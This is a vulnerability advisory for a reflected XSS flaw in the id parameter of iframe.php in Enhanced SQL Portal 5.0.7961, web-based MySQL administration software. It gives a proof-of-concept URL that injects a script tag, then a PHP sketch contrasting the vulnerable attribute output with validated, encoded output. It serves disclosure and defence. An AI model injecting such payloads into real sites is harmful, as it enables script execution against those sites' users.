[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt


Vendor:
www.eliacom.com
www.eliacom.com/mysql-gui-download.php


Product:
Enhanced SQL Portal 5.0.7961
web based MySQL administration application.


Advisory Information:
================================================
Enhanced SQL Portal 5.0.7961 XSS Vulnerability


Vulnerability Details:
=====================
iframe.php contains an XSS vulnerability


Exploit code(s):
===============
http://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id="/><script>alert(666)</script>


Disclosure Timeline:
=========================================================
Vendor Notification: May 28, 2015
June 2, 2015 : Public Disclosure


Severity Level:
=========================================================
Med


Description:
==========================================================

Request Method(s):          [+] GET

Vulnerable Product:         [+] Enhanced SQL Portal 5.0.7961

Vulnerable Parameter(s):    [+] id

Affected Area(s):           [+] iframe

===============================================================

(hyp3rlinx)
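
Mitigation sketch for the id parameter, added here as an illustration; it is not the vendor's iframe.php, whose source the advisory does not show. It assumes id is echoed inside a double-quoted HTML attribute, which the "/> prefix of the proof of concept suggests. The function names, the allow-list pattern and the viewer.php URL are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for the part of iframe.php that reflects ?id=
// into an attribute. The real markup is not shown in the advisory.

/** Vulnerable pattern: raw request data concatenated into an attribute. */
function render_iframe_unsafe(string $id): string
{
    return '<iframe id="' . $id . '" src="viewer.php"></iframe>';
}

/**
 * Hardened pattern:
 *  1. allow-list validation (assumed id format: letters, digits, "_" and "-",
 *     at most 64 characters);
 *  2. attribute-context output encoding as defence in depth.
 * Returns null when the id is rejected; the caller should answer 400.
 */
function render_iframe_safe(string $id): ?string
{
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $id) !== 1) {
        return null;
    }
    $attr = htmlspecialchars($id, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<iframe id="' . $attr . '" src="viewer.php"></iframe>';
}

// Value of id taken from the advisory's proof-of-concept URL.
$poc = '"/><script>alert(666)</script>';

// Unsafe: the quote closes the attribute and a script element is emitted.
echo render_iframe_unsafe($poc), PHP_EOL;

// Safe: validation rejects the value before any markup is produced.
var_dump(render_iframe_safe($poc));

// Encoding alone also neutralises it: the quote and angle brackets
// become entities, so the value stays inside the attribute.
echo htmlspecialchars($poc, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8'), PHP_EOL;

// A well-formed id is rendered normally.
echo render_iframe_safe('report_42'), PHP_EOL;
```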